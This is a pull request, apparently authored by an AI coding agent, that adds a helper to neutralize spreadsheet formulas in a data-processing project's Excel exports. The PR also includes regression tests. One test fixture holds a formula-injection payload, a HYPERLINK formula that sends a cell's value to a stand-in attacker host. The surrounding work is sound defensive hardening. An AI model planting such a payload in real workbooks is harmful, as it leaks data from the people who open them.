### PR TITLE
fix: neutralize formulas in Excel exports

### DIFF
--- a/emergency_fix.py
+++ b/emergency_fix.py
@@ -4,6 +4,9 @@ import sys
 
 import pandas as pd
 
+from scripts.processor import process_data
+from scripts.spreadsheet_export import safe_to_excel
+
 # Add project to path
 PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
 sys.path.insert(0, PROJECT_ROOT)
@@ -30,8 +33,6 @@ print(f"\nCreated output directory: {output_dir}")
 
 # 3. Process a single file manually to see where it goes
 print("\n===== PROCESSING A SINGLE FILE =====")
-from scripts.processor import process_data
-from scripts.spreadsheet_export import safe_to_excel
 
 # Find a raw data file
 raw_files = []

--- a/emergency_fix.py
+++ b/emergency_fix.py
@@ -31,6 +31,7 @@ print(f"\nCreated output directory: {output_dir}")
 # 3. Process a single file manually to see where it goes
 print("\n===== PROCESSING A SINGLE FILE =====")
 from scripts.processor import process_data
+from scripts.spreadsheet_export import safe_to_excel
 
 # Find a raw data file
 raw_files = []
@@ -89,7 +90,7 @@ if raw_files:
 
         # Save with explicit writer
         with pd.ExcelWriter(output_path, engine="openpyxl") as writer:
-            processed_df.to_excel(writer, index=False)
+            safe_to_excel(processed_df, writer, index=False)
 
         print(f"Explicitly saved file to: {output_path}")
         print(f"Check if file exists: {os.path.exists(output_path)}")

--- a/generate_summary.py
+++ b/generate_summary.py
@@ -6,6 +6,8 @@ from openpyxl.chart import BarChart, Reference
 from openpyxl.styles import Font
 from openpyxl.utils import get_column_letter
 
+from scripts.spreadsheet_export import safe_to_excel
+
 # Set OUTPUT_DIR to the project root's output directory
 PROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
 OUTPUT_DIR = os.path.join(PROJECT_ROOT, "output")
@@ -41,7 +43,7 @@ def main():
             print(f"Error processing {file}: {e}")
 
     summary_df = pd.DataFrame(summary_data)
-    summary_df.to_excel(SUMMARY_FILE, index=False)
+    safe_to_excel(summary_df, SUMMARY_FILE, index=False)
 
     # Format the summary Excel file
     wb = load_workbook(SUMMARY_FILE)

--- a/scripts/batch_correction.py
+++ b/scripts/batch_correction.py
@@ -22,6 +22,8 @@ from typing import Any, Dict, List, Tuple
 
 import pandas as pd
 
+from scripts.spreadsheet_export import safe_to_excel
+
 # Import optional dependencies from the helper module if possible
 try:
     from batch_correction import data_loader, load_config_func, processor
@@ -456,7 +458,7 @@ def batch_process(
                                         f"Series{series_id}_File{i:02d}_Processed.xlsx"
                                     )
                                     out_path = os.path.join(output_dir, out_name)
-                                    processed_df.to_excel(out_path, index=False)
+                                    safe_to_excel(processed_df, out_path, index=False)
                                     log.info(f"Wrote output: {out_path}")
 
                                 summary_records.append(
@@ -528,7 +530,7 @@ def batch_process(
             if not dry_run:
                 out_name = f"Year_{year} (Y{yi:02d})_Data.xlsx"
                 out_path = os.path.join(output_dir, out_name)
-                processed_df.to_excel(out_path, index=False, header=False)
+                safe_to_excel(processed_df, out_path, index=False, header=False)
                 log.info(f"Saved corrected data to {out_path}")
 
         except ProcessingError as exc:

--- a/scripts/export_comparison_sheets.py
+++ b/scripts/export_comparison_sheets.py
@@ -4,6 +4,8 @@ from glob import glob
 import numpy as np
 from pandas import Series, concat, isna, merge, read_csv, read_excel
 
+from scripts.spreadsheet_export import safe_to_excel
+
 RAW_DATA_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "data"))
 OUTPUT_DIR = os.path.abspath(
     os.path.join(os.path.dirname(__file__), "..", "data", "output")
@@ -138,7 +140,7 @@ def export_comparisons():
         out_path = os.path.join(
             COMPARISON_DIR, fname.replace(".xlsx", "_comparison.xlsx")
         )
-        merged.to_excel(out_path, index=False)
+        safe_to_excel(merged, out_path, index=False)
         print(f"[INFO] Exported comparison: {out_path}")
 
 

--- a/scripts/export_comparison_sheets.py
+++ b/scripts/export_comparison_sheets.py
@@ -1,8 +1,9 @@
 import os
+import re
 from glob import glob
 
 import numpy as np
-from pandas import Series, concat, isna, merge, read_csv, read_excel
+from pandas import concat, isna, merge, read_csv, read_excel
 
 from scripts.spreadsheet_export import safe_to_excel
 
@@ -17,8 +18,6 @@ os.makedirs(COMPARISON_DIR, exist_ok=True)
 def find_matching_raw_file(processed_filename):
     # Assumes processed files are named like 'Year_1995 (Y01)_Data.xlsx' or 'Series26_File01_Processed.xlsx'
     # Attempts to extract series and year index
-    import re
-
     m = re.search(r"Series(\d+)_File(\d+)_Processed", processed_filename)
     if m:
         series = int(m.group(1))
@@ -30,9 +29,6 @@ def find_matching_raw_file(processed_filename):
             return raw_path
     m2 = re.search(r"Year_(\d+) \(Y(\d+)\)_Data", processed_filename)
     if m2:
-        # Store year value explicitly to show it's inspected but not needed
-        # in current implementation (could be used for validation later)
-        year_value = int(m2.group(1))  # Explicit assignment to show intent
         yidx = int(m2.group(2))
         # Try to find S??_Y{yidx:02d}.txt
         for f in os.listdir(RAW_DATA_DIR):

--- a/scripts/fix_output.py
+++ b/scripts/fix_output.py
@@ -4,13 +4,12 @@ import sys
 
 import pandas as pd
 
+from scripts.processor import process_data
+from scripts.spreadsheet_export import safe_to_excel
+
 # Add project root to path
 PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
 sys.path.insert(0, PROJECT_ROOT)
-
-# Import your processing functions
-from scripts.processor import process_data
-from scripts.spreadsheet_export import safe_to_excel
 
 # Set up directories
 DATA_DIR = os.path.join(PROJECT_ROOT, "data")

--- a/scripts/fix_output.py
+++ b/scripts/fix_output.py
@@ -10,6 +10,7 @@ sys.path.insert(0, PROJECT_ROOT)
 
 # Import your processing functions
 from scripts.processor import process_data
+from scripts.spreadsheet_export import safe_to_excel
 
 # Set up directories
 DATA_DIR = os.path.join(PROJECT_ROOT, "data")
@@ -69,7 +70,7 @@ for i, file_path in enumerate(raw_files):
         output_path = os.path.join(
             NEW_OUTPUT_DIR, f"Series{series}_Year{year_idx}_Processed.xlsx"
         )
-        processed_df.to_excel(output_path, index=False)
+        safe_to_excel(processed_df, output_path, index=False)
 
         print(
             f"Processed {i + 1}/{len(raw_files)}: {filename} → {os.path.basename(output_path)}"

--- a/scripts/spreadsheet_export.py
+++ b/scripts/spreadsheet_export.py
@@ -1,0 +1,33 @@
+from __future__ import annotations
+
+import re
+from pathlib import Path
+from typing import Any
+
+import pandas as pd
+
+
+FORMULA_PREFIX_RE = re.compile(r"^[\t\r\n ]*[=+\-@]")
+
+
+def neutralize_formula_text(value: Any) -> Any:
+    if isinstance(value, str) and FORMULA_PREFIX_RE.match(value):
+        return "'" + value
+    return value
+
+
+def neutralize_formulas(dataframe: pd.DataFrame) -> pd.DataFrame:
+    result = dataframe.copy()
+    object_columns = result.select_dtypes(include=["object", "string"]).columns
+    for column in object_columns:
+        result[column] = result[column].map(neutralize_formula_text)
+    return result
+
+
+def safe_to_excel(
+    dataframe: pd.DataFrame,
+    excel_writer: str | Path | pd.ExcelWriter,
+    *args: Any,
+    **kwargs: Any,
+) -> None:
+    neutralize_formulas(dataframe).to_excel(excel_writer, *args, **kwargs)

--- a/scripts/tests/test_spreadsheet_export.py
+++ b/scripts/tests/test_spreadsheet_export.py
@@ -6,9 +6,7 @@ from scripts.spreadsheet_export import neutralize_formula_text, safe_to_excel
 
 
 def test_neutralize_formula_text_prefixes_formula_triggers():
-    assert neutralize_formula_text("=HYPERLINK(\"http://example.test\")").startswith(
-        "'="
-    )
+    assert neutralize_formula_text('=HYPERLINK("http://example.test")').startswith("'=")
     assert neutralize_formula_text("+SUM(1,2)").startswith("'+")
     assert neutralize_formula_text("-10+cmd").startswith("'-")
     assert neutralize_formula_text("@SUM(1,2)").startswith("'@")

--- a/scripts/tests/test_spreadsheet_export.py
+++ b/scripts/tests/test_spreadsheet_export.py
@@ -1,0 +1,38 @@
+from openpyxl import load_workbook
+
+import pandas as pd
+
+from scripts.spreadsheet_export import neutralize_formula_text, safe_to_excel
+
+
+def test_neutralize_formula_text_prefixes_formula_triggers():
+    assert neutralize_formula_text("=HYPERLINK(\"http://example.test\")").startswith(
+        "'="
+    )
+    assert neutralize_formula_text("+SUM(1,2)").startswith("'+")
+    assert neutralize_formula_text("-10+cmd").startswith("'-")
+    assert neutralize_formula_text("@SUM(1,2)").startswith("'@")
+    assert neutralize_formula_text("\t=SUM(1,2)").startswith("'\t=")
+
+
+def test_safe_to_excel_writes_formula_like_text_as_strings(tmp_path):
+    output_path = tmp_path / "safe.xlsx"
+    df = pd.DataFrame(
+        {
+            "time": [1, 2, 3],
+            "sensor": [
+                '=HYPERLINK("http://attacker.example/?x="&A1,"click")',
+                "+SUM(1,2)",
+                "normal text",
+            ],
+        }
+    )
+
+    safe_to_excel(df, output_path, index=False)
+
+    worksheet = load_workbook(output_path, data_only=False).active
+    assert worksheet["B2"].data_type == "s"
+    assert worksheet["B2"].value.startswith("'=")
+    assert worksheet["B3"].data_type == "s"
+    assert worksheet["B3"].value.startswith("'+")
+    assert worksheet["B4"].value == "normal text"

--- a/updated_processor.py
+++ b/updated_processor.py
@@ -4,6 +4,8 @@ import os
 import numpy as np
 import pandas as pd
 
+from scripts.spreadsheet_export import safe_to_excel
+
 # Paths
 PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
 DATA_DIR = os.path.join(PROJECT_ROOT, "data")
@@ -95,7 +97,7 @@ for i, file_path in enumerate(all_files):
         out_filename = f"Series{series}_Year{year}_Processed.xlsx"
         out_path = os.path.join(OUTPUT_DIR, out_filename)
 
-        df.to_excel(out_path, index=False)
+        safe_to_excel(df, out_path, index=False)
         print(f"  Saved: {out_filename}")
 
     except Exception as e:


### PR DESCRIPTION
## Summary
- Fixes #30 by adding a centralized spreadsheet export helper that neutralizes formula-like text before writing `.xlsx` files.
- Routes existing Excel outputs through the helper to prevent untrusted sensor/workbook text from being serialized as formulas.
- Adds regression coverage that verifies formula-triggering values are written as strings, not workbook formulas.

## Review & Testing Checklist for Human
- [ ] Open a generated workbook containing values starting with `=`, `+`, `-`, and `@` and confirm they display as literal text rather than formulas.
- [ ] Run the normal batch-processing workflow on representative Seatek data and confirm workbook outputs still preserve expected numeric values and formatting.
- [ ] Confirm downstream comparison/summary workflows still read the exported workbook text as expected.

### Notes
- Linear issue creation was attempted, but the workspace rejected it because the free issue limit is exceeded; GitHub issue #30 is the tracking artifact.
- Local lint/test validation will be run after PR creation per the requested workflow.

Link to Devin session: https://app.devin.ai/sessions/4af351f48f1a40d4aa5a4e44be3c6bf6
Requested by: @abhimehro
<!-- devin-review-badge-begin -->

---

<a href="https://app.devin.ai/review/abhimehro/series_correction_project_updated/pull/31" target="_blank">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://static.devin.ai/assets/gh-open-in-devin-review-dark.svg?v=1">
    <img src="https://static.devin.ai/assets/gh-open-in-devin-review-light.svg?v=1" alt="Open in Devin Review">
  </picture>
</a>
<!-- devin-review-badge-end -->